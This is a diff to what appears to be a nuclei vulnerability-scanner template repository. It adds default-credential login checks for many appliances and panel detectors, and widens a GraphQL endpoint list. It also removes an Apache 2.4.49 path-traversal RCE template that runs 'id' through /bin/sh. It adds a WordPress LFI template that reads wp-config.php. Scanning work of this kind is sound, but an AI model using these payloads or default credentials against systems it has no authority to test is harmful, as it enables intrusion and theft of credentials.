default-logins/oracle/businessintelligence-default-login.yaml

@@ -19,13 +19,20 @@ requests:
            <soapenv:Header/>
            <soapenv:Body>
               <rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
-                 <username xsi:type="xsd:string">Administrator</username>
+                 <username xsi:type="xsd:string">{{username}}</username>
-                 <password xsi:type="xsd:string">Administrator</password>
+                 <password xsi:type="xsd:string">{{password}}</password>
                  <domain xsi:type="xsd:string">bi</domain>
               </rep:createSession>
            </soapenv:Body>
         </soapenv:Envelope>
 
+    payloads:
+      username:
+        - Administrator
+      password:
+        - Administrator
+    attack: pitchfork
+
     matchers-condition: and
     matchers:
       - type: status

default-logins/paloalto/panos-default-login.yaml

@@ -9,11 +9,20 @@ info:
   tags: paloalto,panos,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/php/login.php'
+        POST /php/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    body: user=admin&passwd=admin&challengePwd=&ok=Login
+        user={{username}}&passwd={{password}}&challengePwd=&ok=Login
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/panabit/panabit-default-login.yaml

@@ -19,15 +19,22 @@ requests:
         Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
 
         ------WebKitFormBoundaryAjZMsILtbrBp8VbC
-        Content-Disposition: form-data; name="username"
+        Content-Disposition: form-data; name="{{username}}"
 
         admin
         ------WebKitFormBoundaryAjZMsILtbrBp8VbC
-        Content-Disposition: form-data; name="password"
+        Content-Disposition: form-data; name="{{password}}"
 
         panabit
         ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
 
+    payloads:
+      username:
+        - username
+      password:
+        - password
+    attack: pitchfork
+
     matchers-condition: and
     matchers:
       - type: word

default-logins/rabbitmq/rabbitmq-default-login.yaml

@@ -7,11 +7,20 @@ info:
   tags: rabbitmq,default-login
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/api/whoami"
+        GET /api/whoami HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
+        Content-Type: application/x-www-form-urlencoded
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - guest
+      password:
+        - guest
+    attack: pitchfork
+
     matchers-condition: and
     matchers:
       - type: word

default-logins/ricoh/ricoh-weak-password.yaml

@@ -14,7 +14,12 @@ requests:
         Host: {{Hostname}}
         Cookie: cookieOnOffChecker=on;
 
-        wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
+        wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open=
+
+    payloads:
+      username:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/rockmongo/rockmongo-default-login.yaml

@@ -14,7 +14,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{Hostname}}/index.php?action=login.index
 
-        more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
+        more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/samsung/samsung-wlan-default-login.yaml

@@ -8,18 +8,28 @@ info:
   tags: samsung,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/main.ehp"
+        POST /main.ehp HTTP/1.1
-    body: "httpd;General;lang=en&login_id=root&login_pw=sweap12~"
+        Host: {{Hostname}}
+
+        httpd;General;lang=en&login_id={{username}}&login_pw={{password}}
+
+    payloads:
+      username:
+        - root
+      password:
+        - sweap12~
+    attack: pitchfork
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "document.formParent2.changepasswd1.value"
           - "passwd_change.ehp"
-        part: body
+
       - type: status
         status:
           - 200

default-logins/showdoc/showdoc-default-login.yaml

@@ -9,14 +9,21 @@ info:
   tags: showdoc,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/server/index.php?s=/api/user/login"
+        POST /server/index.php?s=/api/user/login HTTP/1.1
-    body: |
+        Host: {{Hostname}}
-      username=showdoc&password=123456&v_code=
+        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+
+        username={{username}}&password={{password}}&v_code=
+
+    payloads:
+      username:
+        - showdoc
+      password:
+        - 123456
+    attack: pitchfork
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
     matchers-condition: and
     matchers:
 

default-logins/solarwinds/solarwinds-default-login.yaml

@@ -12,12 +12,22 @@ info:
   # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
 
 requests:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path
+        GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
-      - "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
+        Host: {{Hostname}}
-    headers:
+        Authorization: Basic {{base64(username)}}
-      Authorization: "Basic YWRtaW46"
+
+      - |
+        GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username)}}
+
+    payloads:
+      username:
+        - admin
+    attack: pitchfork
+
     matchers-condition: and
     matchers:
       - type: word

default-logins/spectracom/spectracom-default-login.yaml

@@ -13,7 +13,14 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
+        data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}}
+
+    payloads:
+      username:
+        - spadmin
+      password:
+        - admin123
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/szhe/szhe-default-login.yaml

@@ -9,13 +9,20 @@ info:
     - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/login/"
+        POST /login/ HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
-    body: |
+
-      email=springbird@qq.com&password=springbird&remeber=true
+        email={{username}}&password={{password}}&remeber=true
+
+    payloads:
+      username:
+        - springbird@qq.com
+      password:
+        - springbird
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/vidyo/vidyo-default-login.yaml

@@ -24,7 +24,14 @@ requests:
         Referer: {{RootURL}}/super/login.html?lang=en
         Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
 
-        username=super&password=password
+        username={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - super
+      password:
+        - password
+    attack: pitchfork
 
     extractors:
       - type: regex

default-logins/viewpoint/trilithic-viewpoint-login.yaml

@@ -16,7 +16,14 @@ requests:
         Content-Type: application/json
         Cookie: trilithic_win_auth=false
 
-        {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
+        {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - trilithic
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/visionhub/visionhub-default-login.yaml

@@ -9,11 +9,18 @@ info:
   reference: https://www.qognify.com/products/visionhub/
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/VisionHubWebApi/api/Login'
+        POST /VisionHubWebApi/api/Login HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Authorization: Basic YWRtaW46YWRtaW4=
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/wifisky/wifisky-default-login.yaml

@@ -16,7 +16,14 @@ requests:
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Connection: close
 
-        username=admin&password=admin
+        username={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/wso2/wso2-default-login.yaml

@@ -14,7 +14,14 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        username=admin&password=admin
+        username={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     redirects: false
     matchers:

default-logins/xxljob/xxljob-default-login.yaml

@@ -14,7 +14,14 @@ requests:
         Host:{{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        userName=admin&password=123456
+        userName={{username}}&password={{password}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - 123456
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

default-logins/zabbix/zabbix-default-login.yaml

@@ -7,14 +7,21 @@ info:
   tags: zabbix,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/index.php'
+        POST /index.php HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-      X-Requested-With: XMLHttpRequest
+        X-Requested-With: XMLHttpRequest
 
-    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
+        name={{username}}&password={{password}}&autologin=1&enter=Sign+in
+
+    payloads:
+      username:
+        - Admin
+      password:
+        - zabbix
+    attack: pitchfork
 
     matchers-condition: and
     matchers:
@@ -24,4 +31,4 @@ requests:
 
       - type: status
         status:
-          - 302
+          - 302

default-logins/zmanda/zmanda-default-login.yaml

@@ -9,14 +9,21 @@ info:
   tags: zmanda,default-login
 
 requests:
-  - method: POST
+  - raw:
-    path:
+      - |
-      - '{{BaseURL}}/ZMC_Admin_Login'
+        POST /ZMC_Admin_Login HTTP/1.1
-    headers:
+        Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
-      Cookie: zmc_cookies_enabled=true
+        Cookie: zmc_cookies_enabled=true
 
-    body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
+        login=AEE&last_page=&username={{username}}&password={{password}}&submit=Login&JS_SWITCH=JS_ON
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    attack: pitchfork
 
     matchers-condition: and
     matchers:

exposed-panels/adiscon-loganalyzer.yaml

@@ -0,0 +1,34 @@
+id: adiscon-loganalyzer
+
+info:
+  name: Detect exposed Adiscon LogAnalyzer
+  author: geeknik
+  severity: high
+  description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services.
+  reference: https://loganalyzer.adiscon.com/
+  tags: adiscon,loganalyzer,syslog,exposures
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Adiscon LogAnalyzer'
+          - 'value="SYSLOG"'
+          - 'value="EVTRPT"'
+          - 'value="WEBLOG"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'

exposed-panels/hpe-system-management-login.yaml

@@ -0,0 +1,27 @@
+id: hpe-system-management-login
+
+info:
+  name: HPE System Management Login
+  author: divya_mudgal
+  severity: info
+  tags: hp,tech,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cpqlogin.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        part: body
+        words:
+          - "HPE System Management Homepage"
+          - "/proxy/ssllogin"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "HPE System Management Homepage v([0-9-.]*)"

exposed-panels/lansweeper-login.yaml

@@ -0,0 +1,26 @@
+id: lansweeper-login
+
+info:
+  name: Lansweeper Login
+  author: divya_mudgal
+  severity: info
+  tags: lansweeper,tech,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.aspx"
+      - "{{BaseURL}}/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: login
+        words:
+          - "Lansweeper - Login"
+
+      - type: dsl
+        name: favicon
+        dsl:
+          - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"

file/electron/electron-version-detect.yaml

@@ -0,0 +1,17 @@
+id: electron-version-detect.yaml
+
+info:
+  name: Electron Version Detect
+  author: me9187
+  severity: info
+  tags: electron,file
+  reference: https://www.electronjs.org/blog/chromium-rce-vulnerability/
+
+file:
+  - extensions:
+      - json
+
+    extractors:
+      - type: regex
+        regex:
+          - '"electronVersion":"[^"]*"'

misconfiguration/unauthenticated-lansweeper.yaml

@@ -0,0 +1,17 @@
+id: unauthenticated-lansweeper
+
+info:
+  name: Unauthenticated Lansweeper Instance
+  author: divya_mudgal
+  severity: high
+  tags: lansweeper,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Default.aspx"
+
+    matchers:
+      - type: word
+        words:
+          - "Main page - Lansweeper"

technologies/graphql-detect.yaml

@@ -2,51 +2,136 @@ id: graphql-detect
 
 info:
   name: GraphQL API Detection
-  author: NkxxkN,ELSFA7110
+  author: NkxxkN,ELSFA7110,@OFJAAAH
   severity: info
-  tags: tech,graphql
+  tags: tech,graphql,fuzz
 
 requests:
   - method: POST
     path:
-      - "{{BaseURL}}/graphql"
+      - "{{BaseURL}}/HyperGraphQL"
+      - "{{BaseURL}}/___graphql"
+      - "{{BaseURL}}/altair"
+      - "{{BaseURL}}/api/cask/graphql-playground"
+      - "{{BaseURL}}/api/graphql"
+      - "{{BaseURL}}/api/graphql/v1"
+      - "{{BaseURL}}/explorer"
+      - "{{BaseURL}}/express-graphql"
+      - "{{BaseURL}}/graph"
+      - "{{BaseURL}}/graph_cms"
       - "{{BaseURL}}/graphiql"
+      - "{{BaseURL}}/graphiql.css"
+      - "{{BaseURL}}/graphiql.js"
+      - "{{BaseURL}}/graphiql.min.css"
+      - "{{BaseURL}}/graphiql.min.js"
+      - "{{BaseURL}}/graphiql.php"
+      - "{{BaseURL}}/graphiql/finland"
+      - "{{BaseURL}}/graphql"
+      - "{{BaseURL}}/graphql-console"
+      - "{{BaseURL}}/graphql-devtools"
+      - "{{BaseURL}}/graphql-explorer"
+      - "{{BaseURL}}/graphql-playground"
+      - "{{BaseURL}}/graphql-playground-html"
       - "{{BaseURL}}/graphql.php"
       - "{{BaseURL}}/graphql/console"
-      - "{{BaseURL}}/v1"
+      - "{{BaseURL}}/graphql/graphql-playground"
-      - "{{BaseURL}}/v2"
+      - "{{BaseURL}}/graphql/schema.json"
-      - "{{BaseURL}}/v3"
+      - "{{BaseURL}}/graphql/schema.xml"
-      - "{{BaseURL}}/graphql-console"
+      - "{{BaseURL}}/graphql/schema.yaml"
+      - "{{BaseURL}}/graphql/v1"
+      - "{{BaseURL}}/je/graphql"
+      - "{{BaseURL}}/laravel-graphql-playground"
+      - "{{BaseURL}}/playground"
+      - "{{BaseURL}}/portal-graphql"
+      - "{{BaseURL}}/query"
+      - "{{BaseURL}}/query-api"
+      - "{{BaseURL}}/query-explorer"
       - "{{BaseURL}}/query-laravel"
-      - "{{BaseURL}}/v3/subscriptions"
+      - "{{BaseURL}}/sphinx-graphiql"
+      - "{{BaseURL}}/subscriptions"
+      - "{{BaseURL}}/v1"
+      - "{{BaseURL}}/v1/altair"
+      - "{{BaseURL}}/v1/api/graphql"
+      - "{{BaseURL}}/v1/explorer"
+      - "{{BaseURL}}/v1/graph"
+      - "{{BaseURL}}/v1/graphiql"
+      - "{{BaseURL}}/v1/graphiql.css"
+      - "{{BaseURL}}/v1/graphiql.js"
+      - "{{BaseURL}}/v1/graphiql.min.css"
+      - "{{BaseURL}}/v1/graphiql.min.js"
+      - "{{BaseURL}}/v1/graphiql.php"
+      - "{{BaseURL}}/v1/graphiql/finland"
+      - "{{BaseURL}}/v1/graphql"
+      - "{{BaseURL}}/v1/graphql-explorer"
+      - "{{BaseURL}}/v1/graphql.php"
+      - "{{BaseURL}}/v1/graphql/console"
+      - "{{BaseURL}}/v1/graphql/schema.json"
+      - "{{BaseURL}}/v1/graphql/schema.xml"
+      - "{{BaseURL}}/v1/graphql/schema.yaml"
+      - "{{BaseURL}}/v1/playground"
+      - "{{BaseURL}}/v1/subscriptions"
+      - "{{BaseURL}}/v2"
+      - "{{BaseURL}}/v2/altair"
+      - "{{BaseURL}}/v2/api/graphql"
+      - "{{BaseURL}}/v2/explorer"
+      - "{{BaseURL}}/v2/graph"
+      - "{{BaseURL}}/v2/graphiql"
+      - "{{BaseURL}}/v2/graphiql.css"
+      - "{{BaseURL}}/v2/graphiql.js"
+      - "{{BaseURL}}/v2/graphiql.min.css"
+      - "{{BaseURL}}/v2/graphiql.min.js"
+      - "{{BaseURL}}/v2/graphiql.php"
+      - "{{BaseURL}}/v2/graphiql/finland"
+      - "{{BaseURL}}/v2/graphql"
+      - "{{BaseURL}}/v2/graphql-explorer"
+      - "{{BaseURL}}/v2/graphql.php"
+      - "{{BaseURL}}/v2/graphql/console"
+      - "{{BaseURL}}/v2/graphql/schema.json"
+      - "{{BaseURL}}/v2/graphql/schema.xml"
+      - "{{BaseURL}}/v2/graphql/schema.yaml"
+      - "{{BaseURL}}/v2/playground"
+      - "{{BaseURL}}/v2/subscriptions"
+      - "{{BaseURL}}/v3"
+      - "{{BaseURL}}/v3/altair"
+      - "{{BaseURL}}/v3/api/graphql"
+      - "{{BaseURL}}/v3/explorer"
+      - "{{BaseURL}}/v3/graph"
+      - "{{BaseURL}}/v3/graphiql"
+      - "{{BaseURL}}/v3/graphiql.css"
+      - "{{BaseURL}}/v3/graphiql.js"
+      - "{{BaseURL}}/v3/graphiql.min.css"
+      - "{{BaseURL}}/v3/graphiql.min.js"
+      - "{{BaseURL}}/v3/graphiql.php"
+      - "{{BaseURL}}/v3/graphiql/finland"
+      - "{{BaseURL}}/v3/graphql"
+      - "{{BaseURL}}/v3/graphql-explorer"
+      - "{{BaseURL}}/v3/graphql.php"
+      - "{{BaseURL}}/v3/graphql/console"
+      - "{{BaseURL}}/v3/graphql/schema.json"
       - "{{BaseURL}}/v3/graphql/schema.xml"
       - "{{BaseURL}}/v3/graphql/schema.yaml"
       - "{{BaseURL}}/v3/playground"
-      - "{{BaseURL}}/v3/graphql/schema.json"
+      - "{{BaseURL}}/v3/subscriptions"
-      - "{{BaseURL}}/graphql/schema.yaml"
+      - "{{BaseURL}}/v4/altair"
-      - "{{BaseURL}}/graphql/schema.xml"
+      - "{{BaseURL}}/v4/api/graphql"
-      - "{{BaseURL}}/graphql/schema.json"
+      - "{{BaseURL}}/v4/explorer"
-      - "{{BaseURL}}/graphiql/finland"
+      - "{{BaseURL}}/v4/graph"
-      - "{{BaseURL}}/graphiql.css"
+      - "{{BaseURL}}/v4/graphiql"
-      - "{{BaseURL}}/graphql-devtools"
+      - "{{BaseURL}}/v4/graphiql.css"
-      - "{{BaseURL}}/graphql/v1"
+      - "{{BaseURL}}/v4/graphiql.js"
-      - "{{BaseURL}}/v1/graphql"
+      - "{{BaseURL}}/v4/graphiql.min.css"
-      - "{{BaseURL}}/api/graphql/v1"
+      - "{{BaseURL}}/v4/graphiql.min.js"
-      - "{{BaseURL}}/portal-graphql"
+      - "{{BaseURL}}/v4/graphiql.php"
-      - "{{BaseURL}}/graphql-playground"
+      - "{{BaseURL}}/v4/graphiql/finland"
-      - "{{BaseURL}}/laravel-graphql-playground"
+      - "{{BaseURL}}/v4/graphql"
-      - "{{BaseURL}}/query-explorer"
+      - "{{BaseURL}}/v4/graphql-explorer"
-      - "{{BaseURL}}/sphinx-graphiql"
+      - "{{BaseURL}}/v4/graphql.php"
-      - "{{BaseURL}}/express-graphql"
+      - "{{BaseURL}}/v4/graphql/console"
-      - "{{BaseURL}}/query"
+      - "{{BaseURL}}/v4/graphql/schema.json"
-      - "{{BaseURL}}/HyperGraphQL"
+      - "{{BaseURL}}/v4/graphql/schema.xml"
-      - "{{BaseURL}}/graphql/graphql-playground"
+      - "{{BaseURL}}/v4/graphql/schema.yaml"
-      - "{{BaseURL}}/graphql-playground-html"
+      - "{{BaseURL}}/v4/playground"
-      - "{{BaseURL}}/graph_cms"
+      - "{{BaseURL}}/v4/subscriptions"
-      - "{{BaseURL}}/query-api"
-      - "{{BaseURL}}/api/cask/graphql-playground"
-      - "{{BaseURL}}/altair"
-      - "{{BaseURL}}/playground"
 
     headers:
       Content-Type: application/json
@@ -65,4 +150,4 @@ requests:
           - "__schema"
           - "(Introspection|INTROSPECTION|introspection).*?"
           - ".*?operation not found.*?"
-        condition: or
+        condition: or

vulnerabilities/apache/apache-httpd-rce.yaml

@@ -1,41 +0,0 @@
-id: apache-httpd-rce
-
-info:
-  name: Apache HTTPd - 2.4.49 (CGI enabled) RCE
-  author: pdteam
-  severity: critical
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
-  reference:
-    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
-    - https://twitter.com/ptswarm/status/1445376079548624899
-    - https://github.com/blasty/CVE-2021-41773
-  tags: cve,cve2021,rce,apache
-
-requests:
-  - raw:
-      - |
-        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        echo Content-Type: text/plain; echo; id
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        condition: and
-        part: body
-        words:
-          - 'uid='
-          - 'gid='
-          - 'groups='
-
-    extractors:
-      - type: regex
-        regex:
-          - "(u|g)id=.*"

vulnerabilities/wordpress/advanced-access-manager-lfi.yaml

@@ -0,0 +1,29 @@
+id: advanced-access-manager-lfi
+
+info:
+  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
+  reference:
+    - https://wpscan.com/vulnerability/9873
+    - https://id.wordpress.org/plugins/advanced-access-manager/
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?aam-media=wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200